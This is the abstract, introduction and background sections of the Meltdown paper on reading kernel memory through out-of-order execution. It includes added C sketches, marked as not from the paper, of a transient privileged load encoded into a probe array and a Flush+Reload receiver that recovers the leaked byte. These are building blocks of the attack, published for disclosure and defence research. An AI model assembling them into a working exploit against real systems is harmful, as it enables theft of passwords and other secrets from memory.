Meltdown
Moritz Lipp1, Michael Schwarz1, Daniel Gruss1, Thomas Prescher2, Werner Haas2,
Stefan Mangard1, Paul Kocher3, Daniel Genkin4, Yuval Yarom5, Mike Hamburg6
1 Graz University of Technology
2 Cyberus Technology GmbH
3 Independent
4 University of Pennsylvania and University of Maryland
5 University of Adelaide and Data61
6 Rambus, Cryptography Research Division
Abstract
The security of computer systems fundamentally relies on memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access. In this paper, we present Meltdown. Meltdown exploits side effects of out-of-order execution on modern processors to read arbitrary kernel-memory locations including personal data and passwords. Out-of-order execution is an indispensable performance feature and present in a wide range of modern processors. The attack is independent of the operating system, and it does not rely on any software vulnerabilities. Meltdown breaks all security assumptions given by address space isolation as well as paravirtualized environments and, thus, every security mechanism building upon this foundation. On affected systems, Meltdown enables an adversary to read memory of other processes or virtual machines in the cloud without any permissions or privileges, affecting millions of customers and virtually every user of a personal computer. We show that the KAISER defense mechanism for KASLR [8] has the important (but inadvertent) side effect of impeding Meltdown. We stress that KAISER must be deployed immediately to prevent large-scale exploitation of this severe information leakage.
1 Introduction
One of the central security features of today’s operating systems is memory isolation. Operating systems ensure that user applications cannot access each other’s memory and prevent user applications from reading or writing kernel memory. This isolation is a cornerstone of our computing environments and allows running multiple applications on personal devices or executing processes of multiple users on a single machine in the cloud.
On modern processors, the isolation between the kernel and user processes is typically realized by a supervisor bit of the processor that defines whether a memory page of the kernel can be accessed or not. The basic idea is that this bit can only be set when entering kernel code and it is cleared when switching to user processes. This hardware feature allows operating systems to map the kernel into the address space of every process and to have very efficient transitions from the user process to the kernel, e.g., for interrupt handling. Consequently, in practice, there is no change of the memory mapping when switching from a user process to the kernel.
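As a concrete illustration of this isolation mechanism, the following minimal user-space sketch (our own illustration, not code from the paper) shows what the supervisor-bit check means in practice: dereferencing a supervisor-only address from user mode raises a page fault. The kernel-space address used is only a placeholder, and the signal handler exists solely so the process can report the fault.

```c
/* Minimal sketch (not from the paper): a user-mode read of a supervisor-only
 * page faults. The address below is only a placeholder for some address in
 * the kernel region; the signal handler exists solely to report the fault. */
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>

static sigjmp_buf env;

static void on_segv(int sig) {
    (void)sig;
    siglongjmp(env, 1);                       /* unwind out of the fault */
}

int main(void) {
    /* Placeholder kernel-space address (assumption, machine-specific). */
    volatile const char *kernel_addr = (volatile const char *)0xffff888000000000ULL;

    signal(SIGSEGV, on_segv);
    if (sigsetjmp(env, 1) == 0) {
        char value = *kernel_addr;            /* denied: the page is marked supervisor-only */
        printf("unexpectedly read %d\n", value);
    } else {
        printf("SIGSEGV: kernel page is not accessible from user mode\n");
    }
    return 0;
}
```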
In this work, we present Meltdown. Meltdown is a novel attack that allows overcoming memory isolation completely by providing a simple way for any user process to read the entire kernel memory of the machine it executes on, including all physical memory mapped in the kernel region. Meltdown does not exploit any software vulnerability, i.e., it works on all major operating systems. Instead, Meltdown exploits side-channel information available on most modern processors, e.g., modern Intel micro-architectures since 2010 and potentially on CPUs of other vendors.
While side-channel attacks typically require very specific knowledge about the target application and are tailored to only leak information about its secrets, Meltdown allows an adversary who can run code on the vulnerable processor to obtain a dump of the entire kernel address space, including any mapped physical memory. The root cause of the simplicity and strength of Meltdown is the side effects caused by out-of-order execution.
Out-of-order execution is an important performance feature of today’s processors in order to overcome latencies of busy execution units, e.g., a memory fetch unit needs to wait for data arrival from memory. Instead of stalling the execution, modern processors run operations out of order, i.e., they look ahead and schedule subsequent operations to idle execution units of the processor. However, such operations often have unwanted side effects, e.g., timing differences [28, 35, 11] can leak information from both sequential and out-of-order execution.
From a security perspective, one observation is particularly significant: out-of-order execution on vulnerable CPUs allows an unprivileged process to load data from a privileged (kernel or physical) address into a temporary CPU register. Moreover, the CPU even performs further computations based on this register value, e.g., access to an array based on the register value. The processor ensures correct program execution by simply discarding the results of the memory look-ups (e.g., the modified register states) if it turns out that an instruction should not have been executed. Hence, on the architectural level (e.g., the abstract definition of how the processor should perform computations), no security problem arises.
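The following simplified C-level sketch illustrates this observation (the actual attack sequence is given in assembly later in the paper; probe_array, kernel_addr, and the 4 KiB stride are illustrative assumptions). The load from the privileged address will raise a fault architecturally, but a dependent access indexed by the loaded byte may already have executed out of order, leaving a trace in the cache.

```c
/* Simplified sketch of the transient sequence: the privileged load faults
 * architecturally, yet the dependent access below may already have run
 * out of order and touched one cache line of the probe array. */
#include <stdint.h>

/* One page per possible byte value, assumed shared with the receiver. */
extern uint8_t probe_array[256 * 4096];

void transient_access(const uint8_t *kernel_addr) {
    /* Architecturally forbidden load; the fault is handled or suppressed
     * elsewhere (e.g., by a signal handler or TSX). */
    uint8_t secret = *kernel_addr;

    /* Dependent access: encodes the byte into the cache state by touching
     * exactly one of the 256 probe pages. */
    *(volatile uint8_t *)&probe_array[secret * 4096];
}
```

The page-sized stride is chosen so that every possible byte value maps to a different page, which keeps the hardware prefetcher from touching neighbouring probe entries and blurring the signal.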
However, we observed that out-of-order memory look-ups influence the cache, which in turn can be detected through the cache side channel. As a result, an attacker can dump the entire kernel memory by reading privileged memory in an out-of-order execution stream, and transmit the data from this elusive state via a micro-architectural covert channel (e.g., Flush+Reload) to the outside world. On the receiving end of the covert channel, the register value is reconstructed. Hence, on the micro-architectural level (e.g., the actual hardware implementation), there is an exploitable security problem.
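As an illustration of such a receiving end, the sketch below recovers the transiently encoded byte with Flush+Reload: flush all 256 probe lines, let the transient sequence run, then time a reload of each line; the one line that reloads fast reveals the byte. It is a sketch under the assumption of x86 intrinsics (_mm_clflush, __rdtscp, _mm_mfence), and the cache-hit threshold is a machine-dependent example value we picked, not a figure from the paper.

```c
/* Sketch of the covert-channel receiver (Flush+Reload). The threshold is
 * machine-dependent; 80 cycles is only an assumed example value. */
#include <stdint.h>
#include <x86intrin.h>            /* _mm_clflush, __rdtscp, _mm_mfence */

#define CACHE_HIT_THRESHOLD 80    /* cycles; must be calibrated per machine */

extern uint8_t probe_array[256 * 4096];

static uint64_t time_access(volatile uint8_t *addr) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                  /* measured load */
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

int recover_byte(void) {
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe_array[i * 4096]);   /* Flush phase */
    _mm_mfence();

    /* ... the transient access of the privileged address runs here ... */

    for (int i = 0; i < 256; i++) {            /* Reload phase */
        if (time_access(&probe_array[i * 4096]) < CACHE_HIT_THRESHOLD)
            return i;                           /* cache hit -> leaked byte value */
    }
    return -1;                                  /* no hit observed */
}
```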
Meltdown breaks all security assumptions given by the CPU’s memory isolation capabilities. We evaluated the attack on modern desktop machines and laptops, as well as servers in the cloud. Meltdown allows an unprivileged process to read data mapped in the kernel address space, including the entire physical memory on Linux and OS X, and a large fraction of the physical memory on Windows. This may include physical memory of other processes, the kernel, and in case of kernel-sharing sandbox solutions (e.g., Docker, LXC) or Xen in paravirtualization mode, memory of the kernel (or hypervisor), and other co-located instances. While the performance heavily depends on the specific machine, e.g., processor speed, TLB and cache sizes, and DRAM speed, we can dump kernel and physical memory with up to 503 KB/s. Hence, an enormous number of systems are affected. The countermeasure KAISER [8], originally developed to prevent side-channel attacks targeting KASLR, inadvertently protects against Meltdown as well. Our evaluation shows that KAISER prevents Meltdown to a large extent. Consequently, we stress that it is of utmost importance to deploy KAISER on all operating systems immediately. Fortunately, during a responsible disclosure window, the three major operating systems (Windows, Linux, and OS X) implemented variants of KAISER and will roll out these patches in the near future.
Meltdown is distinct from the Spectre Attacks [19] in several ways, notably that Spectre requires tailoring to the victim process’s software environment, but applies more broadly to CPUs and is not mitigated by KAISER.
Contributions. The contributions of this work are:
1. We describe out-of-order execution as a new, extremely powerful, software-based side channel.
2. We show how out-of-order execution can be combined with a micro-architectural covert channel to transfer the data from an elusive state to a receiver on the outside.
3. We present an end-to-end attack combining out-of-order execution with exception handlers or TSX, to read arbitrary physical memory without any permissions or privileges, on laptops, desktop machines, and on public cloud machines.
4. We evaluate the performance of Meltdown and the effects of KAISER on it.
Outline. The remainder of this paper is structured as follows:
In Section 2, we describe the fundamental problem which is introduced with out-of-order execution. In Section 3, we provide a toy example illustrating the side channel Meltdown exploits. In Section 4, we describe the building blocks of the full Meltdown attack. In Section 5, we present the Meltdown attack. In Section 6, we evaluate the performance of the Meltdown attack on several different systems. In Section 7, we discuss the effects of the software-based KAISER countermeasure and propose solutions in hardware. In Section 8, we discuss related work and conclude our work in Section 9.
2 Background
In this section, we provide background on out-of-order execution, address translation, and cache attacks.
2.1 Out-of-order execution
Out-of-order execution is an optimization technique that allows maximizing the utilization of all execution units of a CPU core as exhaustively as possible. Instead of processing instructions strictly in the sequential program order, the CPU executes them as soon as all required resources are available. While the execution unit of the current operation is occupied, other execution units can run ahead. Hence, instructions can be run in parallel as long as their results follow the architectural definition.
In practice, CPUs supporting out-of-order execution support running operations speculatively to the extent that the processor’s out-of-order logic processes instructions before the CPU is certain whether the instruction will be needed and committed. In this paper, we refer to speculative execution in a more restricted meaning, where it refers to an instruction sequence following a branch, and use the term out-of-order execution to refer to any way of getting an operation executed before the processor has committed the results of all prior instructions.
In 1967, Tomasulo [33] developed an algorithm that enabled dynamic scheduling of instructions to allow out-of-order execution. Tomasulo [33] introduced a unified reservation station that allows a CPU to use a data value as it has been computed instead of storing it to a register and re-reading it. The reservation station renames registers to allow instructions that operate on the same physical registers to use the last logical one to solve read-after-write (RAW), write-after-read (WAR) and write-after-write (WAW) hazards. Furthermore, the reservation unit connects all execution units via a common data bus (CDB). If an operand is not available, the reservation unit can listen on the CDB until it is available and then directly begin the execution of the instruction.
On the Intel architecture, the pipeline consists of the front-end, the execution engine (back-end) and the memory subsystem [14]. x86 instructions are fetched by the front-end from the memory and decoded to micro-operations (μOPs) which are continuously sent to the execution engine. Out-of-order execution is implemented within the execution engine as illustrated in Figure 1. The Reorder Buffer is responsible for register allocation, register renaming and retiring. Additionally, other optimizations like move elimination or the recognition of zeroing idioms are directly handled by the reorder buffer. The μOPs are forwarded to the Unified Reservation Station that queues the operations on exit ports that are connected to Execution Units. Each execution unit can perform different tasks such as ALU operations, AES operations, address generation (AGU), or memory loads and stores. AGUs as well as load and store execution units are directly connected to the memory subsystem to process its requests.
Figure 1: Simplified illustration of a single core of Intel’s Skylake microarchitecture. Instructions are decoded into μOPs and executed out-of-order in the execution engine by individual execution units.
Since CPUs usually do not run linear instruction streams, they have branch prediction units that are used to obtain an educated guess of which instruction will be executed next. Branch predictors try to determine which direction of a branch will be taken before its condition is actually evaluated. Instructions that lie on that path and do not have any dependencies can be executed in advance and their results immediately used if the prediction was correct. If the prediction was incorrect, the reorder buffer allows to rollback by clearing the reorder buffer and re-initializing the unified reservation station.
Various approaches to predict the branch exist: With static branch prediction [12], the outcome of the branch is solely based on the instruction itself. Dynamic branch prediction [2] gathers statistics at run-time to predict the outcome. One-level branch prediction uses a 1-bit or 2-bit counter to record the last outcome of the branch [21]. Modern processors often use two-level adaptive predictors [36] that remember the history of the last n outcomes and allow predicting regularly recurring patterns. More recently, ideas to use neural branch prediction [34, 18, 32] have been picked up and integrated into CPU architectures [3].
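For illustration, here is a minimal sketch of the classic 2-bit saturating-counter scheme mentioned above; the table size and names are our own and not taken from any particular CPU.

```c
/* Illustrative 2-bit saturating-counter predictor: counter values 0-1 predict
 * "not taken", 2-3 predict "taken", and each counter saturates instead of
 * flipping on a single mispredict. */
#include <stdbool.h>
#include <stdint.h>

#define PHT_ENTRIES 1024
static uint8_t pattern_history[PHT_ENTRIES];   /* each entry holds 0..3 */

static bool predict(uint64_t branch_pc) {
    return pattern_history[branch_pc % PHT_ENTRIES] >= 2;   /* 2,3 => taken */
}

static void update(uint64_t branch_pc, bool taken) {
    uint8_t *ctr = &pattern_history[branch_pc % PHT_ENTRIES];
    if (taken) {
        if (*ctr < 3) (*ctr)++;    /* saturate at "strongly taken" */
    } else {
        if (*ctr > 0) (*ctr)--;    /* saturate at "strongly not taken" */
    }
}
```

With two bits, a single mispredicted iteration (e.g., a loop exit) does not immediately flip the prediction, which is the advantage over a 1-bit counter on loop-heavy code.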